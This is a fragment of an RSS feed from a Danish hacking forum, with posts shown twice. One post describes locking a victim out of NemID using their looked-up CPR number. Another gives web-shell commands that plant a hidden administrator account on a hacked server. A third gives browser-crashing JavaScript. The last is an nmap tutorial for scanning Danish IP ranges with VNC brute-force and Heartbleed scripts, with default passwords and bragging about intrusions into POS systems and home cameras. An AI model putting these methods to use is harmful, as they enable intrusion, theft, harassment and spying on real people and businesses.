Fornyligt opdagede jeg en måde på hvor man kan lukke ned for folks NemID midlertidigt i en periode mellem 3-5 dage.<br />
Metoden er sådan set utrolig simpelt, og da alt jo er styret med NemID i dag, så kan det hurtigt blive spændende.<br />
<br />
For at denne metode skal virke, så kræver det at du kender deres brugernavn eller cpr-nummer til NemID.<br />
Nogle personer bruger deres e-mail som brugernavn til NemID, og cpr-nummer kan du altid bruge uanset om de har sat et brugernavn til eller ej.<br />
Så det kræver lige lidt research til at starte med. Eventuelt kunne man bruge <a href="https://www.shellsec.pw/traad-tinglysning-find-cpr-paa-folk-ud-fra" target="_blank" rel="noopener" class="mycode_url">Tinglysning - Find CPR på folk ud fra navn og fødselsdag</a><br />
<br />
Når du har fundet dit cpr-nummer, brugernavn eller hvad du nu har på personen, så er det sådan set meget simpelt.<br />
Du finder en side hvor du kan login med NemID. - Eksempel: <a href="https://service.nemid.nu/dk-da/#log_paa_selvbetjening" target="_blank" rel="noopener" class="mycode_url">https://service.nemid.nu/dk-da/#log_paa_selvbetjening</a><br />
<br />
Derefter så skriver du Bruger-ID ind, og så skriver du en forkert adgangskode mellem 3 til 5 gangen.<br />
Efter du har skrevet en forkert adgangskode nok, så ville NemID midlertidigt blokere dette NemID.<br />
<br />
Brugeren af NemID'et ville derefter modtage en mail med at de er blevet midlertidigt blokeret på NemID, og skal til at bestille en midlertidig adgangskode som ville tage mellem 3-5 dage for at ankomme med Posten, <br />
og da vi alle kender Post Danmark, så kan det sagtens tage længere tid, hvis man er heldig, men brugeren kan intet stille op indtil de har modtaget den midlertidige adgangskode med posten.]]></description>
			<content:encoded><![CDATA[<span style="font-size: small;" class="mycode_size"><span style="font-family: Verdana, Arial, sans-serif;" class="mycode_font"><span style="font-weight: bold;" class="mycode_b"><span style="color: #ff4500;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Verdana, Arial, sans-serif;" class="mycode_font">NOTE: Det er efter dansk lovgivning strengt forbudt at slå andres CPR numre op og benytte sig af dem.</span></span></span></span></span></span><br />
<br />
Fornyligt opdagede jeg en måde på hvor man kan lukke ned for folks NemID midlertidigt i en periode mellem 3-5 dage.<br />
Metoden er sådan set utrolig simpelt, og da alt jo er styret med NemID i dag, så kan det hurtigt blive spændende.<br />
<br />
For at denne metode skal virke, så kræver det at du kender deres brugernavn eller cpr-nummer til NemID.<br />
Nogle personer bruger deres e-mail som brugernavn til NemID, og cpr-nummer kan du altid bruge uanset om de har sat et brugernavn til eller ej.<br />
Så det kræver lige lidt research til at starte med. Eventuelt kunne man bruge <a href="https://www.shellsec.pw/traad-tinglysning-find-cpr-paa-folk-ud-fra" target="_blank" rel="noopener" class="mycode_url">Tinglysning - Find CPR på folk ud fra navn og fødselsdag</a><br />
<br />
Når du har fundet dit cpr-nummer, brugernavn eller hvad du nu har på personen, så er det sådan set meget simpelt.<br />
Du finder en side hvor du kan login med NemID. - Eksempel: <a href="https://service.nemid.nu/dk-da/#log_paa_selvbetjening" target="_blank" rel="noopener" class="mycode_url">https://service.nemid.nu/dk-da/#log_paa_selvbetjening</a><br />
<br />
Derefter så skriver du Bruger-ID ind, og så skriver du en forkert adgangskode mellem 3 til 5 gangen.<br />
Efter du har skrevet en forkert adgangskode nok, så ville NemID midlertidigt blokere dette NemID.<br />
<br />
Brugeren af NemID'et ville derefter modtage en mail med at de er blevet midlertidigt blokeret på NemID, og skal til at bestille en midlertidig adgangskode som ville tage mellem 3-5 dage for at ankomme med Posten, <br />
og da vi alle kender Post Danmark, så kan det sagtens tage længere tid, hvis man er heldig, men brugeren kan intet stille op indtil de har modtaget den midlertidige adgangskode med posten.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[.]]></title>
			<link>https://www.shellsec.pw/traad---3847</link>
			<pubDate>Thu, 02 Jun 2016 21:28:42 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad---3847</guid>
			<description><![CDATA[fjernet]]></description>
			<content:encoded><![CDATA[fjernet]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Tutorial - serie: 1 > Lav en RDP via din shell]]></title>
			<link>https://www.shellsec.pw/traad-tutorial-serie-1-lav-en-rdp-via-din</link>
			<pubDate>Fri, 22 Apr 2016 20:12:37 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-tutorial-serie-1-lav-en-rdp-via-din</guid>
			<description><![CDATA[Denne tutorial vil lære dig hvordan at du via en shell på din hjemmeside let kan lave en RDP og så gøre den til administrator.<br />
Det er ikke en advanceret process men den er klart god at kende hvis man står og mangler noget at lave lidt 'rav' fra og så uden at sætte de samme spor.<br />
<br />
<br />
Hvis du har en shell på foreksempel: godhatesfags.com/shell.php<br />
Så vil du besøge din shell og trykke dit brugernavn og password og så vil du navigere til shellexec (shell execution)<br />
<br />
Du skriver så i kommando-feltet: <span style="font-weight: bold;" class="mycode_b">net user shell sec /add</span><br />
<br />
Denne kommando tilføjer en bruger på serveren med <span style="font-weight: bold;" class="mycode_b">brugernavn: shell</span> og <span style="font-weight: bold;" class="mycode_b">password: sec</span><br />
<span style="font-weight: bold;" class="mycode_b">Brugernavn: shell</span><br />
<span style="font-weight: bold;" class="mycode_b">Password: sec</span><br />
<br />
Du vil så få tilbage fra din shell med noget ligende "Command has succesfully been executed".<br />
<br />
Du skal nu skrive den sidste linje for at gøre brugeren til en administrator bruger i kommando-feltet: <span style="font-weight: bold;" class="mycode_b">net localgroup administrators shell /add</span><br />
Den kommando gør brugeren '<span style="font-weight: bold;" class="mycode_b">shell</span>' til administrator.<br />
<br />
Du kan nu logge ind på rdp'en via server ip'en og med brugernavnet: shell og password: sec<br />
Enhver ved hvor man ændre brugernavnet og password i kommandoen.<br />
<br />
Alt i alt er det to kommandoer som gør at du via din shell kan lave nogle RDP'er.<br />
Jeg vil anbefalde man max opretter 3 RDP'er på hver shell.]]></description>
			<content:encoded><![CDATA[Denne tutorial vil lære dig hvordan at du via en shell på din hjemmeside let kan lave en RDP og så gøre den til administrator.<br />
Det er ikke en advanceret process men den er klart god at kende hvis man står og mangler noget at lave lidt 'rav' fra og så uden at sætte de samme spor.<br />
<br />
<br />
Hvis du har en shell på foreksempel: godhatesfags.com/shell.php<br />
Så vil du besøge din shell og trykke dit brugernavn og password og så vil du navigere til shellexec (shell execution)<br />
<br />
Du skriver så i kommando-feltet: <span style="font-weight: bold;" class="mycode_b">net user shell sec /add</span><br />
<br />
Denne kommando tilføjer en bruger på serveren med <span style="font-weight: bold;" class="mycode_b">brugernavn: shell</span> og <span style="font-weight: bold;" class="mycode_b">password: sec</span><br />
<span style="font-weight: bold;" class="mycode_b">Brugernavn: shell</span><br />
<span style="font-weight: bold;" class="mycode_b">Password: sec</span><br />
<br />
Du vil så få tilbage fra din shell med noget ligende "Command has succesfully been executed".<br />
<br />
Du skal nu skrive den sidste linje for at gøre brugeren til en administrator bruger i kommando-feltet: <span style="font-weight: bold;" class="mycode_b">net localgroup administrators shell /add</span><br />
Den kommando gør brugeren '<span style="font-weight: bold;" class="mycode_b">shell</span>' til administrator.<br />
<br />
Du kan nu logge ind på rdp'en via server ip'en og med brugernavnet: shell og password: sec<br />
Enhver ved hvor man ændre brugernavnet og password i kommandoen.<br />
<br />
Alt i alt er det to kommandoer som gør at du via din shell kan lave nogle RDP'er.<br />
Jeg vil anbefalde man max opretter 3 RDP'er på hver shell.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Crash af Firefox, Chrome og Safari (sikkert også flere)]]></title>
			<link>https://www.shellsec.pw/traad-crash-af-firefox-chrome-og-safari-sikkert</link>
			<pubDate>Tue, 26 Jan 2016 16:28:57 +0100</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-crash-af-firefox-chrome-og-safari-sikkert</guid>
			<description><![CDATA[Hey, folks!<br />
<br />
Fandt dette sjove script i går, der går ind og crasher ens browser (hvis den bruger samme historik osv. som fx Chrome gør). Alt den faktisk gør, er at sætte en <span style="font-style: italic;" class="mycode_i">fucking</span> lang streng ind i din historik, hvor den næste bliver dobbelt så lang som den forrige.<br />
<br />
Ikke nok med at det crasher din tab.. den crasher også hele browseren. Også selvom Chrome er så smart at køre i processer (skide smart), crasher det stadigvæk hele browseren.<br />
<br />
Kører du dette script på en iPhone der kører Safari, crasher den faktisk telefonen. Det er ikke noget jeg har prøvet, men det skriver mange rapporterer og YouTubere har vist det også <img src="https://www.shellsec.pw/images/smilies/facebook/happy.png" alt="Happy" title="Happy" class="smilie smilie_85" /><br />
<br />
<pre class="line-numbers"><code class="language-javascript">var total = "";<br />
for( var i = 0; i &lt; 100000; i++ ) {<br />
    total = total + i.toString();<br />
    history.pushState(0,0, total);<br />
}</code></pre>
<br />
Du kan teste dette ved at gå herind:<br />
<div><div class="spoiler_header">Tryk kun hvis du har læst overstående <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><a href="http://crashchrome.com/" target="_blank" rel="noopener" class="mycode_url">http://crashchrome.com/</a></div></div>
Have fun <img src="https://www.shellsec.pw/images/smilies/facebook/wink.png" alt="Wink" title="Wink" class="smilie smilie_75" />]]></description>
			<content:encoded><![CDATA[Hey, folks!<br />
<br />
Fandt dette sjove script i går, der går ind og crasher ens browser (hvis den bruger samme historik osv. som fx Chrome gør). Alt den faktisk gør, er at sætte en <span style="font-style: italic;" class="mycode_i">fucking</span> lang streng ind i din historik, hvor den næste bliver dobbelt så lang som den forrige.<br />
<br />
Ikke nok med at det crasher din tab.. den crasher også hele browseren. Også selvom Chrome er så smart at køre i processer (skide smart), crasher det stadigvæk hele browseren.<br />
<br />
Kører du dette script på en iPhone der kører Safari, crasher den faktisk telefonen. Det er ikke noget jeg har prøvet, men det skriver mange rapporterer og YouTubere har vist det også <img src="https://www.shellsec.pw/images/smilies/facebook/happy.png" alt="Happy" title="Happy" class="smilie smilie_85" /><br />
<br />
<pre class="line-numbers"><code class="language-javascript">var total = "";<br />
for( var i = 0; i &lt; 100000; i++ ) {<br />
    total = total + i.toString();<br />
    history.pushState(0,0, total);<br />
}</code></pre>
<br />
Du kan teste dette ved at gå herind:<br />
<div><div class="spoiler_header">Tryk kun hvis du har læst overstående <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><a href="http://crashchrome.com/" target="_blank" rel="noopener" class="mycode_url">http://crashchrome.com/</a></div></div>
Have fun <img src="https://www.shellsec.pw/images/smilies/facebook/wink.png" alt="Wink" title="Wink" class="smilie smilie_75" />]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Lidt sjov med NMAP]]></title>
			<link>https://www.shellsec.pw/traad-lidt-sjov-med-nmap</link>
			<pubDate>Tue, 02 Sep 2014 20:16:26 +0200</pubDate>
			<guid isPermaLink="false">https://www.shellsec.pw/traad-lidt-sjov-med-nmap</guid>
			<description><![CDATA[<span style="font-style: italic;" class="mycode_i">Havde oprindeligt tænkt mig at kalde denne lille frækkert for ’<span style="font-weight: bold;" class="mycode_b">Kedsomhedshacking med NMAP</span>’, da det er en af de utallige ting jeg kan benytte mig af hvis jeg af en eller anden grund ikke har alverden at give mig til. Valgte dog hurtigt at skifte overskrft, da det gik op for mig, at størstedelen nok ville finde dette mere <span style="text-decoration: underline;" class="mycode_u">spændende end kedeligt</span>.</span> <br />
<br />
EDIT:<br />
Satans. Havde glemt det igen. Har skåret ned fra 35 til 10 billeder! ;)<br />
Blev en halv-lang og rodet smøre, så må lige se om ikke jeg kan indskrænke det lidt.<br />
Har heller ikke stavekontrol på dyret her, så det bliver ordnet senere.<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Introduktion</span></span><br />
Det er ABSOLUT ikke noget nyt, og min overbevisning er, at mange herinde allerede har været noget lignende igennem. Det er bare sådan, at når man normalt bruger NMAP, så er det for at skanne et målrettet offer (En IP-adresse eller et netværk) - eller også er det for at skanne efter specifikke porte og fejl i diverse services).<br />
Her vil vi nøjes med at skanne efter de mest brugte porte, som benyttes af alle de forskellige enheder som er forbundet til internettet (Om det så er meningen at de skal være det eller ej er en anden sag).<br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Krav</span></span><br />
<span style="font-weight: bold;" class="mycode_b">NMAP</span> – Her bruger vi <span style="font-weight: bold;" class="mycode_b">Zenmap</span> - for at ydnytte den <span style="text-decoration: underline;" class="mycode_u">grafiske brugerflade</span>, samt <span style="font-weight: bold;" class="mycode_b">lettere tilgang</span> til <span style="text-decoration: underline;" class="mycode_u">tidligere gennemførte skanninger, profiler, plugins osv.</span> <a href="http://nmap.org/download.html" target="_blank" rel="noopener" class="mycode_url">http://nmap.org/download.html</a>)<br />
<span style="font-weight: bold;" class="mycode_b">Et styresystem</span> som <span style="text-decoration: underline;" class="mycode_u">understøttes af NMAP</span> (<span style="font-style: italic;" class="mycode_i">Windows, Linux eller Mac</span>)<br />
<span style="font-style: italic;" class="mycode_i">Zenmap har samme funktioner og brugerflade uafhængig af styresystem, så lige meget hvilket et du foretrækker, vil du stadig være i stand til at følge denne ’tutorial’ uden at afvige fra mine parametre.</span><br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Zenmap</span> Vs. <span style="font-weight: bold;" class="mycode_b">Shodan</span> Vs. <span style="font-weight: bold;" class="mycode_b">Google Dorks</span></span><br />
<span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">Lad os lige få dette på det rene før vi begynder at skanne!</span></span><br />
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Google Dorks</span></span><br />
<a href="http://www.exploit-db.com/google-dorks/" target="_blank" rel="noopener" class="mycode_url">http://www.exploit-db.com/google-dorks/</a><br />
<span style="font-weight: bold;" class="mycode_b">Google Dorks</span> er helt sikkert en sjov måde at finde diverse <span style="text-decoration: underline;" class="mycode_u">servere, overvågningskameraer, routere osv</span>. med, men der er også nogle småting der gør det mindre attraktivt at benytte:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><span style="font-weight: bold;" class="mycode_b">- Enhederne skal på forhånd være crawled/cached af Google<br />
- Enhederne må ikke have dynamisk IP<br />
- En million-milliard 1337-HaX0rZ har allerede kendskab til enheder du vil kunne finde igennem Google.</span></blockquote>
<br />
<span style="font-size: medium;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Shodan</span></span><br />
<a href="http://www.shodanhq.com/" target="_blank" rel="noopener" class="mycode_url">http://www.shodanhq.com/</a><br />
<span style="font-weight: bold;" class="mycode_b">Shodan</span> er et fantastisk projekt, og helt sikkert et jeg har haft min fair andel sjov med. Desværre er flere af de ting der kan ses som <span style="text-decoration: underline;" class="mycode_u">uattraktive</span> ved <span style="font-weight: bold;" class="mycode_b">Google Dorks</span> dog <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">også gældende her</span></span>:<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>- Enhederne skal på forhånd være registreret i Shodans database (Hvis enheden var slukket da Shodans skanningsmotor kørte deres ping/banner grab, vil denne enhed være blevet sprunget over)<br />
- Igen må de ikke have dynamisk IP – Så snart de skifter IP vil det kræve at Shodan – tilfældigt – støder på dem igen<br />
- Igen har et HAV af personer allerede kørt listerne igennem uanede gange<br />
- Koster penge hvis du vil mere end bare skimte til et par søgeresultater</blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Zenmap/NMAP</span></span><br />
Med <span style="font-weight: bold;" class="mycode_b">Zenmap</span> <span style="text-decoration: underline;" class="mycode_u">skanner vi hele rækker af IP’er,</span> og vil derfor <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">ikke være påvirket af de samme begrænsninger som de 2 ovenstående eksempler.</span></span> Er en IP online, så ved vi med det samme at der er liv i en enhed af en slags. Kører selvskabet bag forbindelsen med et setup af dynamiske IP’er, så har vi stadig samme problem som før, men det er også en af det eneste negative sider fra de 2 andre metoder vi støder på)<br />
<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Let’s Do It</span></span><br />
<span style="font-style: italic;" class="mycode_i">Undskylder på forhånd at jeg har fjernet den IP række jeg på nuværende tidspunkt skanner igennem – Det er en guldmine</span> ;)<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Hvis du ikke lige har en liste over danske IP adresser, kan du som udgangspunkt gå til <a href="http://www.whatismyip.com/" target="_blank" rel="noopener" class="mycode_url">http://www.whatismyip.com/</a> eller <a href="http://myip.dk/" target="_blank" rel="noopener" class="mycode_url">http://myip.dk/</a> og starte ud med din egen IP. Her kan du så gå op og ned indtil du ikke længere finder resultater der stammer fra en dansk ydbyder. Efter det, kan du begynde at kigge på danske webhost- og email udbydere. </blockquote>
 <br />
Opsætningen er meget lig den fra min sidste NMAP tutorial, så følgende er gældende:<br />
<br />
<img src="http://anony.ws/i/2014/09/02/n1.png" alt="[Billede: n1.png]" class="mycode_img" /><br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>nmap -p 22,23,80,443,445,8080,5900 --open --script vnc-brute,ssl-heartbleed xx.xx.231-236.1-255</blockquote>
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite><span style="font-weight: bold;" class="mycode_b">nmap:</span> Giver sig selv. Det er det program vi kører - resten er parametre.<br />
<span style="font-weight: bold;" class="mycode_b">-p</span> - Dette er portene vi vil skanne efter: <br />
<blockquote class="mycode_quote"><cite>Citer:</cite>- <span style="font-weight: bold;" class="mycode_b">22</span> (<span style="font-style: italic;" class="mycode_i">SSH</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">23</span> (<span style="font-style: italic;" class="mycode_i">Telnet</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">80</span> (<span style="font-style: italic;" class="mycode_i">HTTP</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">443</span> (<span style="font-style: italic;" class="mycode_i">HTTPS</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">445</span> (<span style="font-style: italic;" class="mycode_i">SMB</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">8080</span> (<span style="font-style: italic;" class="mycode_i">Alternativ til port 80, bruges af flere forskellige services</span>)<br />
- <span style="font-weight: bold;" class="mycode_b">5900</span> (<span style="font-style: italic;" class="mycode_i">VNC</span>)</blockquote>
<span style="font-weight: bold;" class="mycode_b">--open:</span> <span style="font-weight: bold;" class="mycode_b">Begrænser</span> vores skanningen til <span style="font-weight: bold;" class="mycode_b">KUN</span> at vise resultater med <span style="text-decoration: underline;" class="mycode_u">åbne porte</span>. Uden dette vil vi få en væg af tekst med <span style="text-decoration: underline;" class="mycode_u">lukkede og firewalled porte</span>.<br />
<span style="font-weight: bold;" class="mycode_b">--script vnc-brute,ssl-heartbleed:</span> Her vælger vi de script der skal testes på alle online maskiner med <span style="font-weight: bold;" class="mycode_b">portene 5900 og/eller 445 åbne</span>. <span style="font-weight: bold;" class="mycode_b">VNC Brute-Force</span> angreb på opsætninger der <span style="text-decoration: underline;" class="mycode_u">udelukkende</span> kører med <span style="text-decoration: underline;" class="mycode_u">ingen eller svage kodeord</span> (<span style="font-style: italic;" class="mycode_i">Og ingen brug af brugernavne</span>) og <span style="text-decoration: underline;" class="mycode_u">Heartbleed SSL sårbarheden</span>.<br />
<span style="font-weight: bold;" class="mycode_b">xx.xx.231-236.1-255:</span> IP-adresserne der skal skannes efter. </blockquote>
 -- <span style="text-decoration: underline;" class="mycode_u">Vi kan bare fylde på af de porte der tilhører diverse services vi er interesserede i.</span><br />
<span style="font-style: italic;" class="mycode_i">Tag for eksempel et hurtigt kig efter ”POS manual” eller ”Point-of-Sale Manual” eller ”payment terminal manual” på Google – de har i de fleste tilfælde portene stående under setup/konfiguration.</span><br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Hvis vi nu er så heldige at støde på en VNC server uden kodeord, vil vi få følgende output af Zenmap:</span><br />
<br />
<img src="http://anony.ws/i/2014/09/02/nvnc.png" alt="[Billede: nvnc.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">(Her kan vi så bruge en hvilket som helst VNC klient / Viewer til at forbinde til værtscomputeren)</span></span><br />
<br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Hvorimod hvis vi støder på en forbindelse der endnu ikke er patched mod heartbleed sårbarheden, så vil vi få følgende output:</span><br />
<br />
<img src="http://anony.ws/i/2014/09/02/nssl.png" alt="[Billede: nssl.png]" class="mycode_img" /><br />
<br />
<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">(Her kan vi så bruge de uendeligt mange Heartbleed scripts til at dumpe hukommelse, hvilket kan være alt fra Kredit Kort, Session, Bruger+Kodeord, Tilfældig HTML osv.) </span></span><br />
<br />
I langt de fleste tilfælde vil <span style="font-weight: bold;" class="mycode_b">HTTP</span> (<span style="text-decoration: underline;" class="mycode_u">port 80</span>) og <span style="font-weight: bold;" class="mycode_b">HTTPS</span> (<span style="text-decoration: underline;" class="mycode_u">port 445</span>) dog være de porte vi vil være interesserede i, og hvor vi kan få adgang via vores browser til alle mulige forskellige slags enheder/services.<br />
<span style="font-style: italic;" class="mycode_i">Og hvis vi nu finder en IP vi gerne vil have lidt ekstra informationer om, såsom styresystem, service-scan og andre åbne porte, så kan vi jo bare kopiere IP adressen ind som ’Target’ og køre f. eks. ’Regular Scan’ eller en af de andre profiler (Eller opsætte vores egen profil).</span><br />
<br />
<img src="http://anony.ws/i/2014/09/02/n2.png" alt="[Billede: n2.png]" class="mycode_img" /><br />
<br />
<br />
<br />
Nu er der ikke rigtig andet at gøre, end at kopiere disse IP’er ind i vores browser, og se hvad vi støder på. Hvis det er <span style="font-weight: bold;" class="mycode_b">SSL/HTTPS</span>, så<span style="text-decoration: underline;" class="mycode_u"> husk at skrive ’<span style="font-weight: bold;" class="mycode_b">https://</span>’ foran <span style="font-weight: bold;" class="mycode_b">IP’en</span>.</span><br />
<span style="font-weight: bold;" class="mycode_b">De fleste af disse enheder vil kræve at du logger ind, før du kan ændre indstillinger, se systemstatus eller se live video</span>. Her ville det bedste være at <span style="font-weight: bold;" class="mycode_b">søge</span> efter lige <span style="font-weight: bold;" class="mycode_b">præcis den enhed</span> du er <span style="font-weight: bold;" class="mycode_b">havnet i</span>, efterfulgt af ’<span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">default password</span></span>’. <span style="text-decoration: underline;" class="mycode_u">Her er et par eksempler:</span><br />
<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>D-Link default password<br />
Linksys default password<br />
CamEye default password</blockquote>
<br />
<span style="font-weight: bold;" class="mycode_b">Her er min liste over <span style="text-decoration: underline;" class="mycode_u">mest udbredte kodeord</span> – De vil <span style="text-decoration: underline;" class="mycode_u">IKKE</span> komme som en overaskelse</span> ;)<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>Brugernavn: admin<br />
<blockquote class="mycode_quote"><cite>Citer:</cite>’ ’ - Tomt kodeord<br />
’admin’<br />
’1234’<br />
’12345’<br />
’123456’<br />
’4321’<br />
’1111’<br />
‘11111111’</blockquote></blockquote>
<br />
<br />
<br />
Blandt andet mange <span style="font-weight: bold;" class="mycode_b">DVR eller IPCam</span> enheder kræver forskellige <span style="font-weight: bold;" class="mycode_b">browsere</span>, og <span style="font-weight: bold;" class="mycode_b">plugins</span>. <span style="text-decoration: underline;" class="mycode_u">Internet Explorer</span> er meget udbredt blandt kompatible browsere når det kommer til de lidt <span style="font-weight: bold;" class="mycode_b">ældre enheder.</span> <span style="text-decoration: underline;" class="mycode_u">Her kræves det man ændrer lidt i IE’s instillinger</span> for at få lov til at installere <span style="font-weight: bold;" class="mycode_b">usignerede drivers og plugins</span>. Det er bare et spørgsmål om at prøve.<br />
<br />
Der er sindsygt mange enheder inden for hvad vi kan kalde <span style="font-weight: bold;" class="mycode_b">Danmarks Kritiske Infrastruktur</span>, <span style="text-decoration: underline;" class="mycode_u"><span style="font-weight: bold;" class="mycode_b">som ikke burde være frit tilgængeligt over internettet</span></span>. Alligevel har jeg fundet uhyggeligt mange af disse, og det er direkte fucked-up. <span style="font-weight: bold;" class="mycode_b">Dem får i dog ikke lov at se.</span> <span style="font-style: italic;" class="mycode_i">Men med et par timers søgning, er jeg sikker på i selv hurtigt vil få øje på hvor udbredt det er. Vi snakker el- og vandværker der står komplet åbne og klar til at blive angrebet.</span><br />
<br />
<span style="font-size: x-large;" class="mycode_size">Hvad kan vi så bruge det til?</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b">En hel række ting. Her er et par eksempler:</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Køre din egen DNS server</span><br />
Og indtaste dennes IP i forskellige routere du finder. Det kan du bruge til at sniffe folks oplysninger, eller inficere dem ved hjælp af BeeF, Metasploit eller et Exploit Kit.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Udspionere folk eller virksomheder</span><br />
 I ville blive FORBLØFFET hvis i vidste hvor mange overvågningssystemer jeg har fundet, hvis eneste formål er at holde vagt over virksomhedens/personens pengeskab – uviddende om at en tredjepart(mig) kan sidde og kigge med når de indtaster/drejer koden ind. Det samme gælder når det kommer til alarmpaneler/tyverialarmer. Disse kan også sidde lige i skudlinien for deres overvågning.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Indbrud/Røverier</span><br />
Ikke bare alarmpaneler og pengeskabe kan bruges når det kommer til denne type kriminalitet. Hvis du har adgang til et hjems overvågning, har du adgang til deres dagligdag, vaner, husets layout eventuelle steder de gemmer deres egendele.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Voldtægt?</span><br />
Det er nu ikke noget jeg går særlig meget op i ;)<br />
Men har en lang række kameaer der er opsat i og omkring familiehjem. Der kan jeg se når forældrene tager på arbejde, og efterlader børnene alene indtil de selv skal i skole. Hvis en psykisk syg person får fat i et sådan overvågningsystem, ville han kunne udnytte det til noget meget grimt.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">(D)DoS angreb</span><br />
Alle disse systemer har utrollight dårlig sikkerhed, og hvis du kan DDoS’e eller DoS’e et system, vil f. eks. deres overvågningssystem være ubrugeligt, og forskellige forbrydelser vil kunne begåes uden at du bliver optaget på bånd eller harddisk.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: medium;" class="mycode_size">Bruge det til fremtidige angreb</span><br />
Der er mange muligheder for at bruge disse enheder til fremtidige angreb. Er telnet aktiveret? Er SSH aktiveret, og kan det brute-forces? Kan enhedens firmware opdateres? Og i så fald, kan du finde firmwaren og reverse engineer den? - Langt størstedelen af plugins er usignerede, og der er ingen tjek der sørger for at disse rent faktisk stammer fra det rette sted.<br />
Hvis du kan, kan du inficere browser plugins, køre command injection, installere SSH eller Netcat, aktivere telnet osv.<br />
Når du har adgang til selve enheden, og ikke bare dens interface, er der næsten 100% chance for at du kan få adgang til andre enheder og computere på netværket. <br />
Du kan jo overføre NMAP til enheden, og skanne hele netværket igennem – UDEN at skulle være bekymret for eventuelle firewalls.</span><br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">Personligt har jeg brugt denne metode til at få adgang til blandt andet POS systemer over alt i landet. Dette har selvfølgelig udelukkende været for ’<span style="text-decoration: underline;" class="mycode_u">educational purposes</span>’ </span>;)</span><br />
<br />
Den letteste var nok en tankstation der brugte admin/admin til deres online DVR system. Dette DVR system tilladte brugeren at opsætte FTP og Telnet adgang til enheden, og brugte igen admin/admin til forbindelsen. Jeg overførte NMAP, og efter ganske få minutter havde jeg adgang til alle terminalerne, som ovenikøbet ikke havde noget der bare mindede om AV eller IDS. Altså var det næsten skæbnen at de ville have mig til at installere Dexter eller BlackPOS...<br />
I et andet tilfælde kunne jeg køre Netcat igennem reverse engineered firmware, og herefter var historien næsten den samme som før.  Har dog også bricked en helvedes masse enheder ved det. Så det er ikke mit første valg.<br />
Og som nævnt før, så har jeg op til flere forskellige kombinationer til diverse pengeskabe fra en håndfuld firmaer – blandt andet en restaurant jeg er blevet lidt forelsket i. Jeg kan desværre ikke vise jer de aller saftigste fangster, men her er lige lidt blandet for at få en idé om hvad man kan få adgang til:<br />
<br />
<div style="text-align: center;" class="mycode_align">
<span style="font-size: medium;" class="mycode_size">Et casino (Hvor er det?):</span><br />
<img src="http://anony.ws/i/2014/09/02/casino.png" alt="[Billede: casino.png]" class="mycode_img" /><br />
<br />
 <br />
<span style="font-size: medium;" class="mycode_size">En kiosk:</span><br />
<img src="http://anony.ws/i/2014/09/02/quick.png" alt="[Billede: quick.png]" class="mycode_img" /> <br />
<br />
<br />
<span style="font-size: medium;" class="mycode_size">En restaurrant:</span><br />
<img src="http://anony.ws/i/2014/09/02/rest.png" alt="[Billede: rest.png]" class="mycode_img" /> <br />
<br />
<br />
